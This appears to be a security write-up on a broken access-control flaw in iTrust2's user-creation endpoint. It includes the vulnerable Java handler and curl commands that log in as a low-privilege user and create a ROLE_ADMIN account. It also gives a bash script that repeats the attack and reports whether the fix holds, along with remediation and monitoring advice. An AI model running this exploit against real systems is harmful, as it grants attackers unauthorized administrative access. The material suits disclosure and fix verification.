iTrust does not enforce access control on some of its user API endpoints. The user-creation handler below has no role check at all: any authenticated session can reach it and pick the new account's role, including ROLE_ADMIN.
/**
 * Creates a new user from the RequestBody provided, validates it, and saves
 * it to the database.
 *
 * @param userF
 *            The user to be saved
 * @return response
 */
@PostMapping ( BASE_PATH + "/users" )
public ResponseEntity createUser ( @RequestBody final UserForm userF ) {
    // No authorization check here: the only validation is the duplicate-name test below,
    // so the caller's role is never compared against the role requested in userF.
    final User user = new User( userF );
    if ( null != User.getByName( user.getUsername() ) ) {
        return new ResponseEntity( errorResponse( "User with the id " + user.getUsername() + " already exists" ),
                HttpStatus.CONFLICT );
    }
    try {
        user.save();
        // Logged under the calling user, so the action is attributed to whoever holds the session
        LoggerUtil.log( TransactionType.CREATE_USER, LoggerUtil.currentUser(), user.getUsername(), null );
        return new ResponseEntity( user, HttpStatus.OK );
    }
    catch ( final Exception e ) {
        return new ResponseEntity(
                errorResponse( "Could not create " + user.toString() + " because of " + e.getMessage() ),
                HttpStatus.BAD_REQUEST );
    }
}
We first need to log in to iTrust as a non-administrative account (here er) to get an authenticated session. The login form is CSRF-protected, so the token embedded in the login page has to be fetched first and sent along with the POST.
# Get CSRF token from login page
CSRF=$(curl -s --cookie-jar cookies.txt http://172.16.3.26:8080/iTrust2/login | grep _csrf | sed 's/.* value="\([^"]*\)".*/\1/')
# Log in to iTrust and store the session cookie (JSESSIONID) in jsession.txt
curl -v http://172.16.3.26:8080/iTrust2/login --cookie cookies.txt --cookie-jar jsession.txt -H "X-XSRF-TOKEN: ${CSRF}" -d "username=er" -d "password=123456"
Attack: create a new user with an arbitrary role through the REST API, using the low-privilege session from the previous step.
secretUser='{"username":"patient3","password":"secret","password2":"secret","enabled":1,"role":"ROLE_ADMIN"}'
curl -v 'http://172.16.3.26:8080/iTrust2/api/v1/users' -b jsession.txt -d "${secretUser}" -H "Content-Type: application/json" -H "X-XSRF-TOKEN: ${CSRF}"
The request returns HTTP 200 with the new user object: any authenticated user can create an account with any role in the system, including ROLE_ADMIN, which is a full privilege escalation. Two notes for whoever fixes or monitors this. The fix is to restrict the method to administrators, for example with `@PreAuthorize("hasRole('ADMIN')")` on createUser or an equivalent path rule for /api/v1/users in the Spring Security configuration; after the fix the same request from a non-admin session should return 403 Forbidden. And because the handler logs CREATE_USER under LoggerUtil.currentUser(), a successful abuse leaves an audit entry attributed to the low-privilege account that sent the request, which is worth alerting on whenever the created role is ROLE_ADMIN.
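The two steps above combined into one script, as an added example (this is not code from the original write-up or from iTrust2): it logs in, posts the user-creation request and turns the HTTP status into a verdict, so the same script can be rerun after the endpoint is fixed and should then report 403 instead of 200. The base URL, the er/123456 credentials, the endpoint paths and the JSON body are taken from the write-up; everything else (the environment-variable names, the status-code interpretation, and the assumption that a request without a valid session answers 401 or a 302 redirect to the login page) is an assumption of this example.

```shell
#!/usr/bin/env bash
# Added example, not part of the original write-up or of iTrust2: runs the login-then-create
# sequence as one script and turns the HTTP status into a pass/fail verdict, so it also
# verifies the fix later (a non-admin session should then get 403, not 200).
# Assumed: the base URL, the non-admin credentials and the endpoint paths from the write-up;
# override them with the ITRUST_* / NEW_* environment variables (names chosen for this example).
set -u

BASE="${ITRUST_BASE:-http://172.16.3.26:8080/iTrust2}"

# Read login-page HTML on stdin and print the CSRF token from the hidden _csrf input.
# Tags are split one per line first, so the match is the _csrf <input> itself, whatever
# the attribute order, and never another input's value= that shares the same source line.
extract_csrf() {
  tr '>' '\n' | grep -m 1 'name="_csrf"' | sed -n 's/.*value="\([^"]*\)".*/\1/p'
}

# user_json USERNAME ROLE -> the JSON body the endpoint expects (same shape as secretUser above).
user_json() {
  printf '{"username":"%s","password":"secret","password2":"secret","enabled":1,"role":"%s"}' "$1" "$2"
}

# login USERNAME PASSWORD -> authenticates into the cookie jar $JAR and prints the CSRF token.
login() {
  csrf=$(curl -s -c "$JAR" "$BASE/login" | extract_csrf)
  [ -n "$csrf" ] || { echo "no _csrf token on the login page" >&2; return 1; }
  code=$(curl -s -o /dev/null -w '%{http_code}' -b "$JAR" -c "$JAR" \
              -H "X-XSRF-TOKEN: $csrf" -d "username=$1" -d "password=$2" "$BASE/login")
  case "$code" in
    2*|3*) echo "$csrf" ;;
    *)     echo "login POST failed (HTTP $code)" >&2; return 1 ;;
  esac
}

# create_user_status CSRF USERNAME ROLE -> HTTP status of POST /api/v1/users from the current session.
create_user_status() {
  curl -s -o /dev/null -w '%{http_code}' -b "$JAR" -H "X-XSRF-TOKEN: $1" \
       -H 'Content-Type: application/json' -d "$(user_json "$2" "$3")" "$BASE/api/v1/users"
}

# verdict STATUS -> one-line interpretation; 200 means the endpoint accepted the role we asked for.
# The 401/302 reading of "no valid session" is an assumption about the Spring Security setup.
verdict() {
  case "$1" in
    200)     echo "VULNERABLE: non-admin session created a user (HTTP 200)" ;;
    403)     echo "OK: access control enforced, request rejected (HTTP 403)" ;;
    401|302) echo "NOT LOGGED IN: session was not accepted (HTTP $1); check the credentials" ;;
    409)     echo "INCONCLUSIVE: that username already exists (HTTP 409); choose another NEW_USER" ;;
    *)       echo "UNEXPECTED: HTTP $1" ;;
  esac
}

main() {
  JAR=$(mktemp)
  trap 'rm -f "$JAR"' EXIT
  csrf=$(login "${ITRUST_USER:-er}" "${ITRUST_PASS:-123456}") || exit 1
  status=$(create_user_status "$csrf" "${NEW_USER:-patient3}" "${NEW_ROLE:-ROLE_ADMIN}")
  verdict "$status"
  [ "$status" != 200 ]   # exit status 0 only when the endpoint refused the request
}

# The network part only runs when asked for, so the helpers can be sourced and tried offline.
if [ "${RUN_CHECK:-0}" = 1 ]; then
  main
fi
```

Run it with RUN_CHECK=1 ./check_users_endpoint.sh; without that variable the file only defines the helpers, so it can be sourced to try extract_csrf against a saved copy of the login page. Splitting the page into one tag per line before matching is what keeps the token extraction correct when the login page puts several inputs on one source line, a case the greedy one-line grep/sed pipeline above can get wrong by picking up the last value= on the line.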